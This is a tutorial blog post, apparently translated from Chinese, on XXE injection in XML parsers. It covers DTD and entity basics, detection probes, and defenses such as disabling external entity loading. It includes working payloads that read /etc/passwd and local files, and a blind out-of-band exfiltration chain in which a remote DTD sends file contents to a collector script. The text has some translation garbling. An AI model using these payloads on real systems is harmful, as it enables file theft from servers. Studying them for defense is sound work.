Talking about XXE vulnerability attack and defense

You will hold my sleeve and I will put my hand into the trouser pocket

I encountered a xxe vulnerability in a CTF competition. Since I did not study this vulnerability at the time, there was no clue. In order to make up for the web security defense knowledge and reduce the vulnerability shortcomings, I have read some information about the xse vulnerability, and I will share it after learning.

XML Foundation

Before introducing the xxe vulnerability, learn to review the basics of XML. XML is designed to transfer and store data, with a focus on the content of the data, which separates the data from the HTML and is a software- and hardware-independent information transfer tool.

XML Document Structure

XML document structures include XML declarations, DTD document type definitions (optional), and document elements.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<!--XML declaration -->
<?xml version="1.0"?>
<!--Document Type Definition -->
<!DOCTYPE note [ <!--Define this document as a note type document -->
<!ELEMENT note (to,from,heading,body)> <!--Define the note element with four elements -->
<!ELEMENT to (#PCDATA)> <!--Define the to element to be "#PCDATA" type -->
<!ELEMENT from (#PCDATA)> <!--Define the from element to the "#PCDATA" type -->
<!ELEMENT head (#PCDATA)> <!--Define the head element as "#PCDATA" type -->
<!ELEMENT body (#PCDATA)> <!--Define the body element to be "#PCDATA" type -->
]]]>
<!--Document element -->
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>

Since the xke vulnerability is related to DTD documents, the concept of DTD is highlighted.

DTD

A Document Type Definition (DTD) defines a legal XML document building block that uses a set of legal elements to define the structure of a document. DTDs can be declared inline in an XML document (internal reference) or as an external reference.
Internal statement DTD:

1
<!DOCTYPE root element [element declaration]>

Referencing an external DTD:

1
<!DOCTYPE root element SYSTEM "filename">

There are many important keywords in the DTD document as follows:

  • DOCTYPE (declaration of DTD)
  • ENTITY (declaration of the entity)
  • SYSTEM, PUBLIC (external resource application)

Entity

An entity can be understood as a variable, which must be declared in the DTD, and the value of that variable can be referenced elsewhere in the document.
Entities are mainly classified into the following four types by type:

  • Built-in entities (Built-in entities)
  • Character entities
  • General entities
    *Parameter entities

Entities can be divided into internal entities and external entities according to the way of reference, to see how these entities are declared.
For complete entity categories, refer to [DTD - Entities] (https://www.tutorialspoint.com/dtd/dtd_entities.htm)

Introduction to Entity Category

The parameter entity is declared with the % entity name, and the % entity name is also used for reference; the remaining entities are directly declared with the entity name, and the reference is made with the & entity name.
Parameter entities can only be declared in the DTD, referenced in the DTD; the remaining entities can only be declared in the DTD and can be referenced in the xml document.

Internal entity:

1
<!ENTITY entity name "value of entity">

External entity:

1
<!ENTITY entity name SYSTEM "URI">

Parameter entity:

1
2
3
<!ENTITY % Entity Name "Value of Entity">
or
<!ENTITY % entity name SYSTEM "URI">

Example demo: entity + internal entity except parameter entity

1
2
3
4
5
6
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY name "nMask">]>
<foo>
<value>&name;</value>
</foo>

Example demo: parameter entity + external entity

1
2
3
4
5
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY % name SYSTEM "file:///etc/passwd">
%name;
]>

Note: %name (parameter entity) is referenced in the DTD, and &name (the rest of the entity) is referenced in the xml document.

Since the xSe vulnerability mainly exploits the vulnerability caused by the DTD referencing external entities, it is important to look at which types of external entities can be referenced.

External entity

External entities are used in DTDs

1
<!ENTITY entity name SYSTEM "URI">

The grammar refers to an external entity, not an internal entity. What types of external entities can be written in the URL?
The main ones are file, http, https, ftp, etc. Of course, different programs support different things:

Example demonstration:

1
2
3
4
5
6
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY content SYSTEM "file:///etc/passwd">]>
<foo>
<value>&content;</value>
</foo>

XXE Vulnerability

The XXE vulnerability is called XML External Entity Injection, which is an external entity injection vulnerability. The XXE vulnerability occurs when the application parses the XML input. It does not prohibit the loading of external entities, resulting in the loading of malicious external files, resulting in file reading, command execution, and intranet ports. Scan, attack intranet sites, initiate dos attacks and other hazards. The point triggered by the xxe vulnerability is often the location where the xml file can be uploaded. The uploaded xml file is not filtered, resulting in the uploading of a malicious xml file.

xxe Vulnerability Detection

The first step is to check if the XML will be successfully parsed:

1
2
3
4
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY name "my name is nMask">]>
<root>&name;</root>

If the page outputs my name is nMask, the xml file can be parsed.

The second step is to detect whether the server supports DTD referencing external entities:

1
2
3
4
<!DOCTYPE ANY [
<!ENTITY % name SYSTEM "http://localhost/index.html">
%name;
]>

You can determine if the target server has sent a request for test.xml to your server by looking at the logs on your own server.

If support for external entities is supported, there is a high probability that there is a xxe vulnerability.

xxeExploit

There are many hazards in xxe vulnerabilities, such as file reading, command execution, intranet port scanning, attacking intranet sites, launching dos attacks, etc. Here, the method of reading arbitrary files is tested.

Read arbitrary files

Since I was testing on Windows, let it read the contents of the test.txt file under the c drive.

If it is linux, you can read sensitive data in directories such as /etc/passwd.

Any of the above file reads can be successful, except that the DTD can refer to external entities, but also depends on the output information, that is, there is echo. So if the program does not echo, how to read the file content? Need to use the blind xxe vulnerability to exploit.

blind xxe vulnerability

For the traditional XXE, the attacker is required to use the XXE vulnerability to read the server-side files only if the server has an echo or an error. If there is no echo, the Blind XXE vulnerability can be used to construct an out-of-band channel to extract data. .

Create test.php to write the following:

1
2
3
<?php
file_put_contents("test.txt", $_GET['file']) ;
?>

Create index.php to write the following:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
$xml=<<<EOF
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///C:/test.txt">
<!ENTITY % remote SYSTEM "http://localhost/test.xml">
%remote;
%all;
%send;
]>
EOF;
$data = simplexml_load_string($xml) ;
echo "<pre>" ;
print_r($data) ;
?>

Create test.xml and write the following:

1
2
[html] view plain copy
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://localhost/test.php?file=%file;'>">

When accessing http://localhost/index.php, the vulnerable server reads the text.txt content, sends it to test.php on the attacker’s server, and saves the read data to the local test.txt.

*Note: There are many uses of xxe and defensive postures. I will not introduce them here.

xxeBoundfixing and Defense

Using the method of disabling external entities provided by the development language
1
libxml_disable_entity_loader(true);

JAVA:

1
2
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);

1
2
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
Filtering XML data submitted by users

Filter keywords: <!DOCTYPE and <!ENTITY, or SYSTEM and PUBLIC.

Reference Document

https://security.tencent.com/index.php/blog/msg/69
http://blog.csdn.net/u011721501/article/details/43775691
https://b1ngz.github.io/XXE-learning-note/
http://bobao.360.cn/learning/detail/3841.html

本文标题:Talking about XXE vulnerability attack and defense

文章作者:nmask

发布时间:2017年06月20日 - 10:06

最后更新:2019年08月16日 - 15:08

原始链接:https://thief.one/2017/06/20/1/en/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

nmask wechat
欢迎您扫一扫上面的微信公众号,订阅我的博客!
坚持原创技术分享,您的支持将鼓励我继续创作!

热门文章推荐: